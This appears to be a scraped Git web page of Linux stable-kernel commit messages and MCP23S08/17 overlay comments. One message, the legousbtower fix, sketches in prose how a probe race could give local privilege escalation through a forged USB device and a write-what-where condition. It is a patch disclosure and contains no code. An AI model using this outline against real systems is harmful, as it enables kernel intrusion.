urb_p->urb->pipe &= ~(11 << 30);
~~ ^ ~~
Fixes: 79c02cb1fd ("usbip: vudc: Add vudc_rx")
Signed-off-by: Nicolas Iooss <nicolas.iooss_linux@m4x.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit fc1e2c8ea8 upstream.
Commit 367e8560e8 introduced a bug
in fbtft-core where fps is always 0, this is because variable
update_time is not assigned correctly.
Signed-off-by: Ksenija Stanojevic <ksenija.stanojevic@gmail.com>
Fixes: 367e8560e8 ("Staging: fbtbt: Replace timespec with ktime_t")
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 2fae9e5a7b upstream.
This patch fixes a NULL pointer dereference caused by a race codition in
the probe function of the legousbtower driver. It re-structures the
probe function to only register the interface after successfully reading
the board's firmware ID.
The probe function does not deregister the usb interface after an error
receiving the devices firmware ID. The device file registered
(/dev/usb/legousbtower%d) may be read/written globally before the probe
function returns. When tower_delete is called in the probe function
(after an r/w has been initiated), core dev structures are deleted while
the file operation functions are still running. If the 0 address is
mappable on the machine, this vulnerability can be used to create a
Local Priviege Escalation exploit via a write-what-where condition by
remapping dev->interrupt_out_buffer in tower_write. A forged USB device
and local program execution would be required for LPE. The USB device
would have to delay the control message in tower_probe and accept
the control urb in tower_open whilst guest code initiated a write to the
device file as tower_delete is called from the error in tower_probe.
This bug has existed since 2003. Patch tested by emulated device.
Reported-by: James Patrick-Evans <james@jmp-e.com>
Tested-by: James Patrick-Evans <james@jmp-e.com>
Signed-off-by: James Patrick-Evans <james@jmp-e.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 21f54ddae4 upstream.
That just generally kills the machine, and makes debugging only much
harder, since the traces may long be gone.
Debugging by assert() is a disease. Don't do it. If you can continue,
you're much better off doing so with a live machine where you have a
much higher chance that the report actually makes it to the system logs,
rather than result in a machine that is just completely dead.
The only valid situation for BUG_ON() is when continuing is not an
option, because there is massive corruption. But if you are just
verifying that something is true, you warn about your broken assumptions
(preferably just once), and limp on.
Fixes: 22f2ac51b6 ("mm: workingset: fix crash in shadow node shrinker caused by replace_page_cache_page()")
Cc: Johannes Weiner <hannes@cmpxchg.org>
Cc: Miklos Szeredi <miklos@szeredi.hu>
Cc: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 3a402a7095 upstream.
When TIF_SINGLESTEP is set for a task, the single-step state machine is
enabled and we must take care not to reset it to the active-not-pending
state if it is already in the active-pending state.
Unfortunately, that's exactly what user_enable_single_step does, by
unconditionally setting the SS bit in the SPSR for the current task.
This causes failures in the GDB testsuite, where GDB ends up missing
expected step traps if the instruction being stepped generates another
trap, e.g. PTRACE_EVENT_FORK from an SVC instruction.
This patch fixes the problem by preserving the current state of the
stepping state machine when TIF_SINGLESTEP is set on the current thread.
Cc: <stable@vger.kernel.org>
Reported-by: Yao Qi <yao.qi@arm.com>
Signed-off-by: Will Deacon <will.deacon@arm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2016-10-07 15:03:20 +02:00
1601 changed files with 306004 additions and 7984 deletions
// s08-spi<n>-<m>-int-gpio - integer, enables interrupts on a single MCP23S08 device on SPI<n>, CS#<m>, specifies the GPIO pin to which INT output is connected.
// s17-spi<n>-<m>-int-gpio - integer, enables mirrored interrupts on a single MCP23S17 device on SPI<n>, CS#<m>, specifies the GPIO pin to which either INTA or INTB output is connected.
//
// If devices are present on SPI1 or SPI2, those interfaces must be enabled with one of the spi1-1/2/3cs and/or spi2-1/2/3cs overlays.
// If interrupts are enabled for a device on a given CS# on a SPI bus, that device must be the only one present on that SPI bus/CS#.
//
// Example 1: A single MCP23S17 device on SPI0, CS#0 with its SPI addr set to 0 and INTA output connected to GPIO25:
// Example 2: Two MCP23S08 devices on SPI1, CS#0 with their addrs set to 2 and 3. Three MCP23S17 devices on SPI1, CS#1 with their addrs set to 0, 1 and 7:
Some files were not shown because too many files have changed in this diff
Show More
Reference in New Issue
Block a user
Blocking a user prevents them from interacting with repositories, such as opening or commenting on pull requests or issues. Learn more about blocking a user.